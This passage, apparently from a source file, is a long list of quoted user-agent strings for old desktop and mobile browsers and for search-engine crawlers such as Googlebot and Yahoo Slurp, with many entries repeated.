'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)',
'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5',
'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10',
'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)',
'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7',
